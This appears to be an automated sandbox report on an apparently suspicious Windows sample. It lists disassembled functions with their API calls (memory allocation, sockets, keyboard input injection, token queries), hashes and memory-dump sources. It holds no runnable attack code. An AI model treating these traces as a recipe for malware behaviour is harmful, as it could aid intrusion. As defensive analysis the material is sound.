Function 00D7E33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00D7E3D2
CharLowerBuffW.USER32(?,?), ref: 00D7E415

Part of subcall function 00D7DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00D7DAD9

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00D7E615
_memmove.LIBCMT ref: 00D7E628

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 27cb6538614e1613ef12dbbe2b5382b13d8707257feb2dd594070e87ab114d23
Instruction ID: 46289846006cfd0ff36c1de7dd09606e3f2db4ec80833a710b775c7dc18fcb7f
Opcode Fuzzy Hash: 27cb6538614e1613ef12dbbe2b5382b13d8707257feb2dd594070e87ab114d23
Instruction Fuzzy Hash: 5FC14C716083119FC714DF28C480A5ABBE4FF89718F1889ADF8999B351E731E945CFA2

Function 00D783A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00D783D8
CoUninitialize.OLE32 ref: 00D783E3

Part of subcall function 00D5DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00D5DAC5

VariantInit.OLEAUT32(?), ref: 00D783EE
VariantClear.OLEAUT32(?), ref: 00D786BF

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: f3754760efb3705dbfc4b2573e4e9d0a373bb70133238234c780b71496ccc55b
Instruction ID: b31e4b4a973d9431a79f952396b7b7071e83375e10308fc939cbaa8650fdfc0b
Opcode Fuzzy Hash: f3754760efb3705dbfc4b2573e4e9d0a373bb70133238234c780b71496ccc55b
Instruction Fuzzy Hash: 90A13675244701AFCB10DF28C499B1AB7E5FF88314F188448F99A9B3A2DB70ED04DB62

Function 00D57A78 Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00D92C7C,?), ref: 00D57C32
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00D92C7C,?), ref: 00D57C4A
CLSIDFromProgID.OLE32(?,?,00000000,00D8FB80,000000FF,?,00000000,00000800,00000000,?,00D92C7C,?), ref: 00D57C6F
_memcmp.LIBCMT ref: 00D57C90

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: c96478115fdce90fa854a9fe6dfaafc63863817e588f473ea854b16e3fd7bbb7
Instruction ID: 903443131c9900d513c4c6ca98c3f2a269f8054f6fb2f27822cc49f8a8902959
Opcode Fuzzy Hash: c96478115fdce90fa854a9fe6dfaafc63863817e588f473ea854b16e3fd7bbb7
Instruction Fuzzy Hash: A0810A71A00109EFCF04DF94D984EEEB7B9FF89315F244198E915AB250DB71AE0ACB60

Function 00D56DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00D56E04
SysAllocString.OLEAUT32(00000000), ref: 00D56EAD
VariantCopy.OLEAUT32 ref: 00D56EDC
VariantClear.OLEAUT32(?), ref: 00D56F03

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 8a375e89d4c354bce8a47e8f2d47210980ab99abe84762cfd82896be9696ecb7
Instruction ID: 16eca0d19416fe9caf68003b0e033d31b061cfbd38ad7c4c675be8d3c5799f0a
Opcode Fuzzy Hash: 8a375e89d4c354bce8a47e8f2d47210980ab99abe84762cfd82896be9696ecb7
Instruction Fuzzy Hash: 805199306047019ADF20AF69E895A6AF3F5EF48311F74881FED96C72D1DA70D8489B35

Function 00D89A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00FCE638,?), ref: 00D89AD2
ScreenToClient.USER32(00000002,00000002), ref: 00D89B05
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00D89B72

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 6bc011bf42d051e10dc30dcf6e10662faa89c8fc177b89139b7e0b100e2324d1
Instruction ID: 8438324cb4624dcb251f29b85a1bb8a44e79c32cd008c157a183de65afb19372
Opcode Fuzzy Hash: 6bc011bf42d051e10dc30dcf6e10662faa89c8fc177b89139b7e0b100e2324d1
Instruction Fuzzy Hash: A4510D74A00209AFCF14DF68D891ABEBBB5FF55320F188669F8559B290D730AD41CB60

Function 00D76CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00D76CE4
WSAGetLastError.WSOCK32(00000000), ref: 00D76CF4

Part of subcall function 00D09997: __itow.LIBCMT ref: 00D099C2
Part of subcall function 00D09997: __swprintf.LIBCMT ref: 00D09A0C

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00D76D58
WSAGetLastError.WSOCK32(00000000), ref: 00D76D64

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 4902364b7edce61d8dcbf6d8a7298ea67c5ccff84e91ddfe89a84b599efacfb6
Instruction ID: 1e90a18fb8ce8578ebd91d27730426ca7615ea59ef9b441dc2dd3c2def4263fb
Opcode Fuzzy Hash: 4902364b7edce61d8dcbf6d8a7298ea67c5ccff84e91ddfe89a84b599efacfb6
Instruction Fuzzy Hash: 31418274750600AFEB20AF24DC96F7A77A5DB44B10F448018FA5D9B2D3EAB19D018BB1

Function 00D7672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00D8F910), ref: 00D767BA
_strlen.LIBCMT ref: 00D767EC

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: e0319bef61e8f12712223184a22df66dbbd6df592f9ccdd7d0cba72f5a00e4c2
Instruction ID: aeb42bb59a9cf014b8ccb08798fccc802229adf818dd3250294e3a99a98897c0
Opcode Fuzzy Hash: e0319bef61e8f12712223184a22df66dbbd6df592f9ccdd7d0cba72f5a00e4c2
Instruction Fuzzy Hash: D9419F31A00604ABCB14EB64DCD5FAEB7A9EF48314F148169F9199B2D2EB70ED44CB71

Function 00D6BA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00D6BB09
GetLastError.KERNEL32(?,00000000), ref: 00D6BB2F
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00D6BB54
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00D6BB80

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 140b48c82df12207a66ebf8fd79107eaad8a90b82cd18dbf952e26910426f2d4
Instruction ID: 36ba45efe0e616f809700bee86810bdeb2c7c4d14c1e4e596f99c323e5a3a882
Opcode Fuzzy Hash: 140b48c82df12207a66ebf8fd79107eaad8a90b82cd18dbf952e26910426f2d4
Instruction Fuzzy Hash: A3412839600610DFCB10EF69C594A5DBBE1EF49320B098499E84A9B7A2CB74FD41CBB1

Function 00D88AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00D88B4D

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 0ec59573e510b4dda50e365e46647b7abfa61d75de10717911bf5b48d39bb73a
Instruction ID: 2ac778af18e8b31319293a704e76bd0813e4a918661af2d797f096db8639b763
Opcode Fuzzy Hash: 0ec59573e510b4dda50e365e46647b7abfa61d75de10717911bf5b48d39bb73a
Instruction Fuzzy Hash: F63190B4640304BFEB24BB58CC85FA937A5EB85320FA84616FA55D62E0DE30F940A771

Function 00D8ADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00D8AE1A
GetWindowRect.USER32(?,?), ref: 00D8AE90
PtInRect.USER32(?,?,00D8C304), ref: 00D8AEA0
MessageBeep.USER32(00000000), ref: 00D8AF11

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 68c5cf6ae33c23ddbaf176d2acc3da3a48b3ac3afd29974545a4bf4934308ee9
Instruction ID: f40634233c174966af01869671e00fecc41b7dc8608259cf765878fa106e127c
Opcode Fuzzy Hash: 68c5cf6ae33c23ddbaf176d2acc3da3a48b3ac3afd29974545a4bf4934308ee9
Instruction Fuzzy Hash: 9741487060021A9FEB12EF5CC884A697BF5FF49350F1885AAF914DB351D730E801DB62

Function 00D60FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00D61037
SetKeyboardState.USER32(00000080,?,00000001), ref: 00D61053
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00D610B9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00D6110B

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: c2c24d898816db48c2486844e183818a885a54cdfe68aaa909b4bb949db8f16d
Instruction ID: 82a061af53ebf1af7e70c3a00519153d0f8edc00fc570ff14b0655b9f3b4e419
Opcode Fuzzy Hash: c2c24d898816db48c2486844e183818a885a54cdfe68aaa909b4bb949db8f16d
Instruction Fuzzy Hash: 04310334E40698AFFF308B66CC05BFABBA9EB49310F1C425AE591921D1C37589C59771

Function 00D61121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00D61176
SetKeyboardState.USER32(00000080,?,00008000), ref: 00D61192
PostMessageW.USER32(00000000,00000101,00000000), ref: 00D611F1
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00D61243

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 4e7be14419aa1f590c0e797fe4b0b3cee6a7924612407ad348e7e7d5618c6f42
Instruction ID: 4e74d11b071f0c73a58aeccc9d278e46caa0fb9e145c7d71625cacaadf8368d6
Opcode Fuzzy Hash: 4e7be14419aa1f590c0e797fe4b0b3cee6a7924612407ad348e7e7d5618c6f42
Instruction Fuzzy Hash: E7312634A4071CAFEF308BA5CC15BFABBAAEB4A310F0C435AE680921D1C33889559775

Function 00D36415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00D3644B
__isleadbyte_l.LIBCMT ref: 00D36479
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00D364A7
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00D364DD

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 6ad484fa60319dd55e0150d6a34d40a214db1faa112b958fe5ee9a706a11b4a4
Instruction ID: 7e197d0bca3613a7c25237524497843f82595a4e884095edb97028eb266d6da7
Opcode Fuzzy Hash: 6ad484fa60319dd55e0150d6a34d40a214db1faa112b958fe5ee9a706a11b4a4
Instruction Fuzzy Hash: 0331C131A0825ABFDB218F75CC45BAA7BA5FF41310F198429E8958B291D731D850DBB0

Function 00D85175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00D85189

Part of subcall function 00D6387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00D63897
Part of subcall function 00D6387D: GetCurrentThreadId.KERNEL32 ref: 00D6389E
Part of subcall function 00D6387D: AttachThreadInput.USER32(00000000,?,00D652A7), ref: 00D638A5

GetCaretPos.USER32(?), ref: 00D8519A
ClientToScreen.USER32(00000000,?), ref: 00D851D5
GetForegroundWindow.USER32 ref: 00D851DB

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: a40b5f419b16a8d10dc1d11b648d4b8915c90793c8b988e39583ea77723ae0bf
Instruction ID: 7e2aa5c0b87649d55d1043d9738514dea95434757143882081cea711e6aebf46
Opcode Fuzzy Hash: a40b5f419b16a8d10dc1d11b648d4b8915c90793c8b988e39583ea77723ae0bf
Instruction Fuzzy Hash: D031EF71A00208AFDB00EFA5C855AEFF7F9EF98304F10406AE515E7252EA759E45CBB1

Function 00D8C788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D02612: GetWindowLongW.USER32(?,000000EB), ref: 00D02623

GetCursorPos.USER32(?), ref: 00D8C7C2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00D3BBFB,?,?,?,?,?), ref: 00D8C7D7
GetCursorPos.USER32(?), ref: 00D8C824
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00D3BBFB,?,?,?), ref: 00D8C85E

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 860e0796ae185156fddf9d14091b65033d6374d0c113f3afba49a82fe97e3cc3
Instruction ID: 9b2326e1bea14da8d38ec700b2454a35a48f9d41070a86e9eb7d9e316fc7e5e2
Opcode Fuzzy Hash: 860e0796ae185156fddf9d14091b65033d6374d0c113f3afba49a82fe97e3cc3
Instruction Fuzzy Hash: BE315A35610118EFCB25DF59C898EEA7BBAEF49710F4841A9F9058B2A1C7319D50DBB0

Function 00D20BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00D20BF2

Part of subcall function 00D05B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00D67B20,?,?,00000000), ref: 00D05B8C
Part of subcall function 00D05B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00D67B20,?,?,00000000,?,?), ref: 00D05BB0

_fprintf.LIBCMT ref: 00D20C29
OutputDebugStringW.KERNEL32(?), ref: 00D56331

Part of subcall function 00D24CDA: _flsall.LIBCMT ref: 00D24CF3

__setmode.LIBCMT ref: 00D20C5E

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 673518ef010bfc891c8c529c097fd9c0cb3e036d2c0e326ba55c6ccccc5f9923
Instruction ID: 338147a0b8d94b63e62129b6785b6e81d53a2e99ade4412d53fdb9d259fdd3fc
Opcode Fuzzy Hash: 673518ef010bfc891c8c529c097fd9c0cb3e036d2c0e326ba55c6ccccc5f9923
Instruction Fuzzy Hash: A21166729042187BDB04B7B4BC43ABEBB68DF55324F18011AF908971C2DE609D859BB5

Function 00D58B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D58652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00D58669
Part of subcall function 00D58652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00D58673
Part of subcall function 00D58652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D58682
Part of subcall function 00D58652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00D58689
Part of subcall function 00D58652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D5869F

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00D58BEB
_memcmp.LIBCMT ref: 00D58C0E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D58C44
HeapFree.KERNEL32(00000000), ref: 00D58C4B

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 597cef5dd446721ed234d843ae2cbdf5191ce9d35c80eabc0201b7f810f09ba4
Instruction ID: 325ad3b702565bdbac88aec511a27b7ac73b88a5d2a3cf25804395964fb79925
